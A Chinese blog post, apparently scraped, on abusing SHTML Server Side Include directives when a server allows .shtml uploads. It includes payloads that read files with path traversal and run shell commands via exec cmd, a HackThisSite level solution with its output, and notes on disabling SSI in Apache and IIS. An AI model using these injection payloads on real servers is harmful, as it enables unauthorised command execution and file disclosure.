SHTML的利用

SHTML用的是SSI指令

关于SSI指令:http://httpd.apache.org/docs/2.4/howto/ssi.html

在PHP禁止了命令执行函数,开了安全模式和服务器可以上传SHTML文件的时候可以试试看

当然服务器要允许SHTML的执行

<!--#include file="/home/www/user6987/nav_foot.htm"--> //可以用来读文件

<!--#include virtual="/includes/header.html" --> //这个支持../来切换目录来读取文件

<!--#exec cgi="/cgi-bin/gb.cgi"-->//将会执行CGI程序gb.cgi

<!--#exec cmd="ifconfig"--> //可以用来执行命令

<!--#printenv--> //显示当前存在于web系统中的所有环境变量

<!--#echo var="DOCUMENT_URI" --> //显示当前文档的虚拟路径

禁止方法:

.Apache,将access.conf中的"Options Includes ExecCGI"这行代码删除;

.在IIS中,要禁用 #exec 命令,可修改 SSIExecDisable 元数据库;

在HackThisSite中也有道题目是考察SSI指令的。

Basic8:

<!-- #exec cmd="ls ../" -->

#output
#Hi, au12ha39vc.php index.php level8.php tmp!
#Your name contains 39 characters.
时间: 2024-08-04 22:21:33

SHTML的利用的相关文章

利用jsoup解析天气预报

java的一个开源的解析Html的程序jsoup将html进行解析,并且让我们可以像对css操作一样来获取解析之后的内容,本文即利用其特性进行解析 jsoup的开源jar包请自行下载 public class WeatherInfo {     /**      * @param args      */     public static void main(String[] args) {         getCityWeatherInfo();         //getCityAndU

Fckeditor漏洞利用总结

Fckeditor漏洞利用总结  查看编辑器版本FCKeditor/_whatsnew.htmlFCKeditor/editor/dialog/fck_about.htmlFCKeditor/_samples/default.htmlaeditor/filemanager/browser/default/browser.html?Connector=../../connectors/cfm/connector.cfm editor/filemanager/connectors/asp/conne

SHTML 教程

什么是 SHTML 使用SSI(Server Side Include)的html文件扩展名,SSI(Server Side Include),通常称为“服务器端嵌入”或者叫“服务器端包含”,是一种类似于ASP的基于服务器的网页制作技术. SSI工作原理: 将内容发送到浏览器之前,可以使用“服务器端包含 (SSI)”指令将文本.图形或应用程序信息包含到网页中.例如,可以使用 SSI 包含时间/日期戳.版权声明或供客户填写并返回的表单.对于在多个文件中重复出现的文本或图形,使用包含文件是一种简便的

hbase 利用rowkey设计进行多条件查询

摘要 本文主要内容是通过合理Hbase 行键(rowkey)设计实现快速的多条件查询,所采用的方法将所有要用于查询中的列经过一些处理后存储在rowkey中,查询时通过rowkey进行查询,提高rowkey的利用率,加快查询速度.行键(rowkey)并不是简单的把所有要查询的列的值直接拼接起来,而是将各个列的数据转成整型(int)数据来存储.之后实现两个自定义的比较器(comparator):一个是相等比较器,用于实现类似于SQL的多条件精确查找功能. select * from table wh

Fckeditor常见漏洞的挖掘与利用整理汇总

查看编辑器版本 FCKeditor/_whatsnew.html ------------------------------------------------------------- 2. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破!测试通过. ------------------------------------------------------------- 3.Version <=2.4.2 For php 在处理PHP 上传的地方并未

什么是 SHTML

什么是 SHTML 使用SSI(Server Side Include)的html文件扩展名,SSI(Server Side Include),通常称为“服务器端嵌入”或者叫“服务器端包含”,是一种类似于ASP的基于服务器的网页制作技术. SSI工作原理: 将内容发送到浏览器之前,可以使用“服务器端包含 (SSI)”指令将文本.图形或应用程序信息包含到网页中.例如,可以使用 SSI 包含时间/日期戳.版权声明或供客户填写并返回的表单.对于在多个文件中重复出现的文本或图形,使用包含文件是一种简便的

FCKeditor漏洞利用

FCKeditor漏洞利用 查看编辑器版本 FCKeditor/_whatsnew.html fckeditor/editor/dialog/fck_about.html ————————————————————————————————————————————————————————————— 2. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破!测试通过. —————————————————————————————————————————————————

htm,html,xhtml,xml,xsl,dhtml,shtm和shtml的区分

介绍一下htm,html,xhtml,xml,shtml的区分,以下内容来自百度后的知识整理. HTML和htm: HTML(Hypertext Markup Language)超文本传输语言,是www的描述语言,由HTML命令组成的+描述性文本,页面中没有服务端执行的语言.而htm,实际上和HTML没有本质意义的区别,只是为了满足DOS仅能识别8+3(文件名不超过8个字符,扩展名不超过3个字符)的文件名而已,因为一些老的系统不能识别四位的文件名,所以某些网页服务器要求index.html的最后

利用openswan配置VPN服务

CentOS6.5  利用openswan xl2tpd配置VPN服务 OpenSWan是Linux下IPsec的最佳实现方式,其功能强大,最大程度地保证了数据传输中的安全性.完整性问题OpenSWan支持2.0.2.2.2.4以及2.6内核,可以运行在不同的系统平台下,包括X86.X86_64.IA64.MIPS以及ARMOpenSWan是开源项目FreeS/WAN停止开发后的后继分支项目,由三个主要组件构成:配置工具(ipsec命令脚本)Key管理工具(pluto)内核组件(KLIPS/26